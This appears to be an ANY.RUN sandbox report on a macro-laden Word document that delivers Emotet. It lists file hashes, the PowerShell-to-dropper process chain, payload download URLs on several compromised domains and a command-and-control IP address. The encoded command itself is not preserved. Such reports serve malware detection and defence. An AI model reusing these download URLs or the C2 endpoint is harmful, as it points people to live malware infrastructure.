File name: Adjunto 18-09-2019_638769.doc
Full analysis: https://app.any.run/tasks/32b10eb8-36db-4e56-a272-ab9fbe726c66
Verdict: Malicious activity
Threats: Emotet

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime it has been upgraded into a very destructive piece of malware. It mostly targets corporate victims, but private users are also infected through mass spam email campaigns.

Analysis date: September 19, 2019, 08:15:26
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags: macros, macros-on-open, generated-doc, emotet-doc, emotet, loader, trojan
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Road Valleys, Subject: Solutions, Author: Dannie Larson, Comments: Borders input Wisconsin, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed Sep 18 11:25:00 2019, Last Saved Time/Date: Wed Sep 18 11:25:00 2019, Number of Pages: 1, Number of Words: 95, Number of Characters: 547, Security: 0
MD5: 5CAAB07BECCB0C5500A1C85059292817
SHA1: 0011075A8BA0669FF2121FE85B4919C8768162BB
SHA256: 4A914195A0FE3CED9590ABC67D5171AD425121C1774BD44B176EA02625ECC73A
SSDEEP: 6144:MJpm1VmTG3cBubZMHY6I2KDNTto08WQBqLkI47NSU4jJntATfDXcj1jVkAP:MJpm1VmTG3cBubZMHY6I2KDNTto08WQs

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided as is, for the user's information only. ANY.RUN does not guarantee the maliciousness or safety of the content.
  • MALICIOUS
    • Application was dropped or rewritten from another process
      • 553.exe (PID: 3704)
      • 553.exe (PID: 3592)
      • 553.exe (PID: 2540)
      • 553.exe (PID: 2288)
      • easywindow.exe (PID: 3868)
      • easywindow.exe (PID: 2896)
      • easywindow.exe (PID: 3652)
      • easywindow.exe (PID: 2976)
    • Downloads executable files from the Internet
      • powershell.exe (PID: 2480)
    • Emotet process was detected
      • 553.exe (PID: 2540)
    • EMOTET was detected
      • easywindow.exe (PID: 3652)
    • Connects to CnC server
      • easywindow.exe (PID: 3652)
    • Changes the autorun value in the registry
      • easywindow.exe (PID: 3652)
  • SUSPICIOUS
    • Executed via WMI
      • powershell.exe (PID: 2480)
    • PowerShell script executed
      • powershell.exe (PID: 2480)
    • Creates files in the user directory
      • powershell.exe (PID: 2480)
    • Executable content was dropped or overwritten
      • powershell.exe (PID: 2480)
      • 553.exe (PID: 2540)
    • Starts itself from another location
      • 553.exe (PID: 2540)
  • INFO
    • Creates files in the user directory
      • WINWORD.EXE (PID: 2748)
    • Reads Microsoft Office registry keys
      • WINWORD.EXE (PID: 2748)
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Title: Road Valleys
Subject: Solutions
Author: Dannie Larson
Keywords: -
Comments: Borders input Wisconsin
Template: Normal.dotm
LastModifiedBy: -
RevisionNumber: 1
Software: Microsoft Office Word
TotalEditTime: -
CreateDate: 2019:09:18 10:25:00
ModifyDate: 2019:09:18 10:25:00
Pages: 1
Words: 95
Characters: 547
Security: None
CodePage: Windows Latin 1 (Western European)
Company: Ruecker, Deckow and Schaefer
Lines: 4
Paragraphs: 1
CharCountWithSpaces: 641
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: -
HeadingPairs: Title, 1
Manager: Stamm
CompObjUserTypeLen: 32
CompObjUserType: Microsoft Word 97-2003 Document
Total processes: 44
Monitored processes: 10
Malicious processes: 9
Suspicious processes: 0

Behavior graph

Process chain as drawn in the graph (edges are labelled "start" or "drop and start"; nodes marked "no specs" carry no signature details; #EMOTET marks the nodes on which the Emotet detection fired):

winword.exe (no specs) -> powershell.exe -> 553.exe (no specs) -> 553.exe (no specs) -> 553.exe (no specs) -> 553.exe (#EMOTET) -> easywindow.exe (no specs) -> easywindow.exe (no specs) -> easywindow.exe (no specs) -> easywindow.exe (#EMOTET)

Process information

PID | CMD | Path | Parent process

2748 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Adjunto 18-09-2019_638769.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | explorer.exe
  User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft Word; Version: 14.0.6024.1000

2480 | powershell -encod … (encoded command not preserved in this copy of the report) | …:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | wmiprvse.exe
  User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows PowerShell; Exit code: 0; Version: 6.1.7600.16385 (win7_rtm.090713-1255)

2288 | "C:\Users\admin\553.exe" | C:\Users\admin\553.exe | powershell.exe
  User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Display Control Panel; Exit code: 0; Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)

3592 | "C:\Users\admin\553.exe" | C:\Users\admin\553.exe | 553.exe
  User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Display Control Panel; Exit code: 0; Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)

3704 | --12e39b71 | C:\Users\admin\553.exe | 553.exe
  User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Display Control Panel; Exit code: 0; Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)

2540 | --12e39b71 | C:\Users\admin\553.exe | 553.exe
  User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Display Control Panel; Exit code: 0; Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)

3868 | "C:\Users\admin\AppData\Local\easywindow\easywindow.exe" | C:\Users\admin\AppData\Local\easywindow\easywindow.exe | 553.exe
  User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Display Control Panel; Exit code: 0; Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)

2896 | "C:\Users\admin\AppData\Local\easywindow\easywindow.exe" | C:\Users\admin\AppData\Local\easywindow\easywindow.exe | easywindow.exe
  User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Display Control Panel; Exit code: 0; Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)

2976 | --fd47f3b8 | C:\Users\admin\AppData\Local\easywindow\easywindow.exe | easywindow.exe
  User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Display Control Panel; Exit code: 0; Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)

3652 | --fd47f3b8 | C:\Users\admin\AppData\Local\easywindow\easywindow.exe | easywindow.exe
  User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Display Control Panel; Exit code: - (still running at the end of the analysis); Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)
Total events: 1 752
Read events: 1 270
Write events: 0
Delete events: 0

Modification events: no data

Executable files: 2
Suspicious files: 10
Text files: 0
Unknown types: 43

Dropped files

PID | Process | Filename | Type

2748 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR89C6.tmp.cvr | -
  MD5: -; SHA256: -
2748 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F4859467.wmf | wmf
  MD5: FB641C8B39410211D488179F3625520A; SHA256: 492C4DF31CEDB1A72F2DA8AEDD4A61C960D916D1E31F4D02880D684050833A42
2748 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exd | tlb
  MD5: 863FC9E97BDABBD5E0AD3A061D730927; SHA256: 631E4424A221D05EF613531881AC807632D0C00DBC96D767F329D59B4C305051
2748 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\922FE742.wmf | wmf
  MD5: 2C64CC7906851654BECC58E932B54067; SHA256: 74D486DBCDDC7BDE3D579CB4563C60BE8FCBEB638AB2662B4DF5FF81A1656BC7
2748 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\596611A9.wmf | wmf
  MD5: 6B232F06630C97465E6098E6E7EF91C2; SHA256: D4D5A703DF27A43AB2318A62EE2D4AE39D0283111997F963100C357B2CAC06D3
2748 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc
  MD5: 88ABADDDE8B095C14C82DED4AA3E98A8; SHA256: 8D5CB2D2FCDF98FFBB4137FECCCE676088224E7B460E9D2E430FB81EEF264873
2748 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3AB765EB.wmf | wmf
  MD5: 8D4EACF4722D45628723E6EEC52F1B69; SHA256: 1BBFFA6476B54BE7129F3F0B2E1593D514307C640CCC060812F7291E031E6E22
2748 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$junto 18-09-2019_638769.doc | pgc
  MD5: 6199A21420910EED099FED24C1C07EF7; SHA256: 487B153F3D3E01FAD65FB11D547A158F418C31DE8300F87E1CD54B365ED04358
2748 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BECBCA9F.wmf | wmf
  MD5: 92C37AFF33750374D0613E7D359D7FDE; SHA256: 9A2E2B0727CA22725A082F744D5CF05350D0940A26A8B251B3931F3A9184AA61
2748 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\92E9DD12.wmf | wmf
  MD5: EA0C9997579D3523446A8D08E957E954; SHA256: 3E269C34542807668CE5D957F60623C1C8C9FABFA4C101D2E32193F502AF532A
HTTP(S) requests: 5
TCP/UDP connections: 4
DNS requests: 6
Threats: 0

HTTP requests

PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation
2480 | powershell.exe | GET | 404 | 185.57.197.56:80 | http://grupoeq.com/leds/dal52301/ | ES | html | 273 b | suspicious
2480 | powershell.exe | GET | 200 | 83.137.145.97:80 | http://kirstenbijlsma.com/ecp4/mhh20305/ | NL | executable | 376 Kb | suspicious
2480 | powershell.exe | GET | 302 | 129.121.15.236:80 | http://brikee.com/gallery/4dcmn72430/ | US | html | 227 b | suspicious
3652 | easywindow.exe | POST | 200 | 114.79.134.129:443 | http://114.79.134.129:443/between/loadan/ringin/ | IN | binary | 132 b | malicious
2480 | powershell.exe | GET | 200 | 129.121.15.236:80 | http://brikee.com/cgi-sys/suspendedpage.cgi | US | html | 7.12 Kb | suspicious

Connections

PID | Process | IP | Domain | ASN | CN | Reputation
3652 | easywindow.exe | 114.79.134.129:443 | - | D-Vois Broadband Pvt Ltd | IN | malicious
2480 | powershell.exe | 83.137.145.97:80 | kirstenbijlsma.com | Duocast B.V. | NL | suspicious
2480 | powershell.exe | 129.121.15.236:80 | brikee.com | Colo4, LLC | US | suspicious
2480 | powershell.exe | 185.57.197.56:80 | grupoeq.com | Tecnocratica Centro de Datos, S.L. | ES | suspicious

DNS requests

Domain | IP | Reputation
brikee.com | 129.121.15.236 | suspicious
www.echelona.net | - | unknown
grupoeq.com | 185.57.197.56 | suspicious
kirstenbijlsma.com | 83.137.145.97 | suspicious

Threats

PID | Process | Class | Message
2480 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP
2480 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
2480 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP
3652 | easywindow.exe | A Network Trojan was detected | AV TROJAN W32/Emotet CnC Checkin (Apr 2019)
3652 | easywindow.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet
3652 | easywindow.exe | Potentially Bad Traffic | ET POLICY HTTP traffic on port 443 (POST)
4 further ETPRO signatures are available in the full report.

Debug info: none